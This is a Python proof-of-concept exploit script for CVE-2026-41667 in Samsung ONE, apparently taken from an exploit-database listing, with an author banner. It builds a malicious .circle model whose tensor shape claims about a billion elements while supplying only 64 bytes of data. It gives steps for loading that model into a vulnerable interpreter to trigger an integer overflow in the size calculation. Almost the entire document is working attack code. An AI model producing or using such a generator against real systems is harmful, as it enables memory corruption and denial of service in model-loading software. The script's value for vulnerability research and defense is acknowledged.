#!/usr/bin/env python3 # Exploit Title: Samsung ONE - Integer Overflow in CircleConst Tensor Size Calculation # CVE: CVE-2026-41667 # Date: 2026-04-25 # Exploit Author: Mohammed Idrees Banyamer # Author Country: Jordan # Instagram: @banyamer_security # Author GitHub: https://github.com/mbanyamer # Vendor Homepage: https://github.com/Samsung/ONE # Software Link: https://github.com/Samsung/ONE # Affected: Samsung ONE prior to PR #16481 (before 1.30.0) # Tested on: Samsung ONE (vulnerable build) # Category: Local # Platform: Linux # Exploit Type: Proof of Concept - Malicious Model Generator # CVSS: 6.6 # CWE : CWE-190 # Description: Generates a malicious .circle model that triggers integer overflow in num_elements * element_size calculation. # Fixed in: https://github.com/Samsung/ONE/pull/16481 # Usage: python3 exploit.py # # Examples: # python3 exploit.py # # Options: None (standalone generator) # # Notes: Requires flatc generated 'circle' module. Loads with luci-interpreter or ONE runtime. # # How to Use # # Step 1: Generate bindings with flatc --python circle.fbs # Step 2: Run this script to create poc_cve_2026_41667.circle # Step 3: Load the model in vulnerable ONE build print(r""" ╔════════════════════════════════════════════════════════════════════════════════════════════╗ ║ ║ ║ ▄▄▄▄· ▄▄▄ . ▄▄ • ▄▄▄▄▄ ▄▄▄ ▄▄▄· ▄▄▄· ▄▄▄▄▄▄▄▄▄ .▄▄▄ ▄• ▄▌ ║ ║ ▐█ ▀█▪▀▄.▀·▐█ ▀ ▪•██ ▪ ▀▄ █·▐█ ▀█ ▐█ ▄█•██ ▀▀▄.▀·▀▄ █·█▪██▌ ║ ║ ▐█▀▀█▄▐▀▀▪▄▄█ ▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄ ▄█▀▀█ ██▀· ▐█.▪▐▀▀▪▄▐▀▀▄ █▌▐█· ║ ║ ██▄▪▐█▐█▄▄▌▐█▄▪▐█ ▐█▌·▐█▌.▐▌▐█•█▌▐█ ▪▐▌▐█▪·• ▐█▌·▐█▄▄▌▐█•█▌▐█▄█▌ ║ ║ ·▀▀▀▀ ▀▀▀ ·▀▀▀▀ ▀▀▀ ▀█▄▀▪.▀ ▀ ▀ ▀ .▀ ▀▀▀ ▀▀▀ .▀ ▀ ▀▀▀ ║ ║ ║ ║ b a n y a m e r _ s e c u r i t y ║ ║ ║ ║ >>> Silent Hunter • Shadow Presence <<< ║ ║ ║ ║ Operator : Mohammed Idrees Banyamer Jordan 🇯🇴 ║ ║ Handle : @banyamer_security ║ ║ ║ ║ CVE-2026-41667 • Samsung ONE Integer Overflow ║ ║ ║ ╚════════════════════════════════════════════════════════════════════════════════════════════╝ """) import flatbuffers import sys import os try: import circle as c except ImportError: print("Error: 'circle' module not found.") print("Generate it with: flatc --python compiler/luci/schema/circle.fbs") print("Then copy the generated 'circle' folder here.") sys.exit(1) def create_poc_model(output_path="poc_cve_2026_41667.circle"): builder = flatbuffers.Builder(1024 * 1024) huge_shape = [1, 1, 1, 1 << 30] c.ShapeStartDimsVector(builder, len(huge_shape)) for d in reversed(huge_shape): builder.PrependInt32(d) shape_dims = builder.EndVector() shape = c.Shape.CreateShape(builder, shape_dims) data_bytes = b'\x00' * 64 data_vec = builder.CreateByteVector(data_bytes) c.CircleConstStart(builder) c.CircleConstAddShape(builder, shape) c.CircleConstAddDtype(builder, c.DataType.INT8) c.CircleConstAddBuffer(builder, 0) c.CircleConstAddValue(builder, data_vec) const = c.CircleConstEnd(builder) c.SubGraphStartTensorsVector(builder, 1) builder.PrependUOffsetTRelative(const) tensors = builder.EndVector() c.SubGraphStartInputsVector(builder, 1) builder.PrependInt32(0) subgraph_inputs = builder.EndVector() c.SubGraphStartOutputsVector(builder, 1) builder.PrependInt32(0) subgraph_outputs = builder.EndVector() subgraph = c.SubGraphCreateSubGraph(builder, tensors=tensors, inputs=subgraph_inputs, outputs=subgraph_outputs, operators=None, name=b"main") c.ModelStartSubgraphsVector(builder, 1) builder.PrependUOffsetTRelative(subgraph) subgraphs = builder.EndVector() c.ModelStart(builder) c.ModelAddVersion(builder, 1) c.ModelAddSubgraphs(builder, subgraphs) model = c.ModelEnd(builder) builder.Finish(model) buf = builder.Output() with open(output_path, "wb") as f: f.write(buf) print(f"[+] PoC model created: {output_path}") print(f" Shape: {huge_shape} → ~{1<<30} elements (INT8)") print(f" Load with: ./luci-interpreter {output_path}") if __name__ == "__main__": create_poc_model()